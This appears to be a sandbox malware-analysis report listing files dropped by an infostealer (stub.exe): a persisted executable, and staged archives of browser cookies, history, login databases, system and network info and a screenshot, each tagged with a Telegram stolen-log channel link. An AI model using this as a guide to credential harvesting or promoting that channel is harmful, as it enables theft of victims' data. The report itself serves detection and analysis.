                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11168256
                                                                                                                                                                                                                                  Entropy (8bit):7.997435059161403
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:196608:1a4vbUQYRyS/Kh44vTM1NExeka13ZlfNf5PWwShXBFPHIG1MZBwYFCnvkC2:7vDX0gZvT2U/S3ZllEhxFPIG1rYFC8C
                                                                                                                                                                                                                                  MD5:CD463D16CF57C3A9F5C9588A878A7213
                                                                                                                                                                                                                                  SHA1:EF22C2B11EFC0BC6A739B82F9A26EDAEE9348B8F
                                                                                                                                                                                                                                  SHA-256:49F4789274E5C0DCD4D2CC1B850761353BF8B72E819D12DF5C376FD665DA1283
                                                                                                                                                                                                                                  SHA-512:5B20CE36B15F5D002D183850032067B11F811544BAC19E0A76340DF47294D0B059FA8DC43FEDD8480D6F72EB8357D01924DBE9CBEBDAAC1625C5F4F498392822
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....f...>..%..........@............................. ......VP....`... ..........................................................S... ..............................................`...(...................h................................text...(...........................`..`.data...............................@....rdata...*.......,..................@..@.eh_fram............................@....pdata....... ......................@..@.xdata..p....0......................@..@.bss.....<...@...........................idata..............................@....CRT....`...........................@....tls................................@....rsrc....S.......T..................@..@.reloc...............h..............@..B................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2axqsebb

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:qn:qn
                                                                                                                                                                                                                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:blat

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):536301
                                                                                                                                                                                                                                  Entropy (8bit):7.997837908882131
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:Olc4PP8RcgTBuiKPpHldqu0Z+1/1DDRZJwkl7gFsoUQO7jGmGhdE:B438OgVTKPpFdqu02dwkTgmGhdE
                                                                                                                                                                                                                                  MD5:3E0D86D10DA4724DAA5D97CDD23FCD38
                                                                                                                                                                                                                                  SHA1:7CDEE77D010E9BEBF1DA0D2F42FDFA67E29A374D
                                                                                                                                                                                                                                  SHA-256:7D16FA4123FBBD78B85DE1B160212C10842F17D4CF37D19C942796732E46FE3B
                                                                                                                                                                                                                                  SHA-512:39160F0D2D97EF46E6C9195EC5CE7EAE3DD6E256C199EF942EE964409E6E00898F2A3ED338E842408B74387A6F3ED4B82169542200A61286D65DB9E677FC6ADE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........ I.Y................Browsers/PK.........I.Y................Wallets/PK........ I.Y................network_info.txt.....0.E.@..}.m..R...p."T.'....M"...[......s.l...=....8..T..v...pM....._...e^.e^T+.....!L......;.j..^....k4>....=...@...?vd.O3.ZA.H.,..M.....PK........ I.Y{.....Ia......process_info.txt.\.n.7....?..8..0@....F..T..N.hK.H#.l.__...y.....yg=.y..\r^...V].k_.z.n.....z.|.x_..m.+/O^|..u......f~.'..7..d2.~n;..\,+?.l.o...7.7....ixc]o.~o..u...o|...G..... .....tB.>.R../.8....n....8'.<[2mT...... ....4q.E....(.L.DAl.n...]...vj.7.>{v...Y.m..?..:+.....QT.....3..i.U^QX...`....9!a..p.K.....v...1Y..Uh.)._..n......b%......H2M..>I......8..{`.U@i..J..M.1"...r..Oi..X..T.e..=E..b..YM.^..!...$.P...fE.,/...%.~....h.&-Jp.....4\0.:.tB0.Rc%*.I.`e. ..^XU..Q..!+..9i...b....#|.n>.l..5_~.!..3g6......L..QXU.Yh..p-j.N%.rH.n..a..2.d..?..LJ.%....IQ`.d<....V....6...r].&d..s.9...w!...)..(...t......,>.....8BH.uC..S.Yb.-.R).Uhw.S......e*%.......%)Wc.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):437
                                                                                                                                                                                                                                  Entropy (8bit):5.326754838889865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:LgeQ1i23rsrzxbiEv3r4ZmIrBNuYraqWTfqgqlB1Hwsv7OjPy:Lge527AzkEv745BNuMWfqnym7O7y
                                                                                                                                                                                                                                  MD5:2D552CCDC77C802D3ED668D0FB9CAA6F
                                                                                                                                                                                                                                  SHA1:F6F61F6F2A6AE00F8C005D860EC48558F154FBF5
                                                                                                                                                                                                                                  SHA-256:FD7FDCF37BCDD14D10CB56433E8318B13BDDCBF0AC40013DC25D188A15656B45
                                                                                                                                                                                                                                  SHA-512:A220FE8C00C0B5D3B393C3FD75FEAE899F2E16CBE8B8CCB831FD7160524399C4794FBA0EB4F2DFDB2780E34ED851F23B15B8DB58B28C0BF61A273F85283F14D3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================...google.com.TRUE./.FALSE.13343559538131870.1P_JAR.2023-10-05-08...google.com.TRUE./.FALSE.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1017
                                                                                                                                                                                                                                  Entropy (8bit):5.025401594516921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:L7wrxsM0T/CrxsaQT/iWifT/QiRJT/TiCQERoT/Wier1En:L708mVcexFMwkcREn
                                                                                                                                                                                                                                  MD5:EB94A57BCE07B7CFD5571378819F7345
                                                                                                                                                                                                                                  SHA1:6F391CFB6E4DE8BA2AE6D1E8B1F2125AA8883038
                                                                                                                                                                                                                                  SHA-256:2646EAC7747EDE706599059C12D913E021E7626E0824B59D680E78AA7139B5D2
                                                                                                                                                                                                                                  SHA-512:D6961B6C5112F16FAF405C756AC8F14CEA52BFF655B28CBDD16F7A0358EF3419E67A859A21515B26750446BDF2169CFABFB960F312DC0DC66AFA403CECC3CD54
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..ID: 1 | URL: https://support.mozilla.org/products/firefox | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 2 | URL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 3 | URL: https://www.mozilla.org/contribute/ | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 4 | URL: https://www.mozilla.org/about/ | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 5 | URL: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 6 | URL: https://www.mozilla.org/privacy/firefox/ | Title: None | Visit Count: 1 | Last Visit Time: 1

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                  Entropy (8bit):4.338300482640769
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:111T8N9EQVjKrIC49MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:LgeQ1ip0X3RwwN3UuJA01K5CLpqI
                                                                                                                                                                                                                                  MD5:ED34788824AB4BBC7FD19B2E8DA67ECB
                                                                                                                                                                                                                                  SHA1:6A09A5A851A990058795092B42F07216E242B388
                                                                                                                                                                                                                                  SHA-256:961DBE546270EF81076A7428872B2DBC138D21A29586BF36FCDFFAB55278F821
                                                                                                                                                                                                                                  SHA-512:BA06CCDD803DDE470627FCBE3AC4D0E8EEDFE8B2F32676B0159DF9A9C6863A560C121E71A33FFD6C5262BC3DD776D4D13EB1C8B999A95404160083876B82041E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24905
                                                                                                                                                                                                                                  Entropy (8bit):4.718806775318882
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JKDxgUteG6DVBkJnhAGwGlt2FHxDxoAcUPINFKPy2k1v9MHyyITGjfpQ/KlKRCGA:FsJ/Sve+
                                                                                                                                                                                                                                  MD5:C0B52B311900457F2A120D25D682373E
                                                                                                                                                                                                                                  SHA1:6F0BC33422294BFD76FEF460B508C030FE71A9FD
                                                                                                                                                                                                                                  SHA-256:2213627AC92E25BC1C13B2E04A7498B08542036598418F29019A88B5D168BA2D
                                                                                                                                                                                                                                  SHA-512:0FCA949CE34C344B145F6E6041D0B0A60EF33A50040181A59F3C8A1786A0999FAA70E87CE525C67BFE78C1BA88590941BB0CEC9FC9F559FE6EB1979505765ED2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 180 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 78'564 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'204 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'160 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'972 K......Image Name: winlogon.exe...PID:

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):546672
                                                                                                                                                                                                                                  Entropy (8bit):7.942073518878461
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:RTe1RCLr/EwqjfZls5tabuQBaCyVkKNa4MyJaB:RGirhqTHaQBI1NVgB
                                                                                                                                                                                                                                  MD5:E5EDA853E64D1F5833AAB6A0EAEC451D
                                                                                                                                                                                                                                  SHA1:DA7EA2597E95205D9A8798A4EA22CB71F4E65007
                                                                                                                                                                                                                                  SHA-256:8AA006C0B0DE65E654E43A6985E64C3A517A04138DA9FBDC3C80F4D64EA9B9A7
                                                                                                                                                                                                                                  SHA-512:AAD5C44A5DB512DA192A458685922BBC181A277A629538EC037DB4C33FE8B882F6668C830947271ECEC4700F74EC84E97FC3F801D480C002FE58695916643362
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.e........j..y......Y..L.....[.~.n.+LQ.g........%!..{Sxo.0....o..2x.7B...'........<.2..2~k}:"~..'O.j...Ir.'nh....6....[Q..{...7.....g.l7.u.\...0..F.......s.%;bOKvM............o..W...w.Evy9.e.|>\.....".X...".o.......$;.Fz.[....5.o.E...'=.:. I......zm.r.CJ..W:"+..`.I...N...\v..~..oiIv.... =...TN.\';...9.."....m...}..}.%......8..TJ..u. =..:.cZS=....fG?..Q.dG>..|.F..g. W=.@.Fc.cH.x...X.q...T..z.N..a.-.O...]..r.C..G.'........}@...].N0f....\r...]7.....kM..+..~..=]...r.k.....4..\_.8.I.}......r...}..?...:h].u...u..k......?w...g.K.^.V.>....g.9....]..w#|M.o...:.n.|?..".1..}.Y+Cks...m..P.k......2...\.H{W.s#.[.z.....................?...w.Kg,........m2}I...ke.:.?.c..c.........].Z......O.{N_.`..50...y......%~L........:r....d..IK\6qq.wO...C....>o..C......b-m...f......V..D_7~..L...}r.....FL....z...\:na.K...9..y<.9=O{t.......s....5..G.}h...g1..L.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142599
                                                                                                                                                                                                                                  Entropy (8bit):4.363440534336225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:IdUX+DlXP3yliETe+9THzgbnGYqTd47N1bTtd+hw45VJhj8n0WFD8FlZlP3gjQYq:IdrFkb
                                                                                                                                                                                                                                  MD5:FAF536F1EFAEB0C24F68C2467CBD8B05
                                                                                                                                                                                                                                  SHA1:8E0F38864D311F8809F4C730D015AF1F411EEB28
                                                                                                                                                                                                                                  SHA-256:5B87BF05D6BB8C590A4F04394EA6C80AB656F09D18A84BD55647A698508089DB
                                                                                                                                                                                                                                  SHA-512:9640ABE50F534BA73D10203EA18600DA2214C247E45A5B1AC2FCF9D946B94B3A944E65A464D165134F12D766B8974D6749EE4BE2953D79B9054012D274D39423
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71431-70569-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 10:34:23...System Manufacturer: H2hEcmn5xdEAHT6...System Model: xRpxRRt9...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AutofillData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cookies.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DownloadData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HistoryData.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Logins.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Web.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_343fogz1.cfy.ps1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_folyckgt.u3b.ps1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
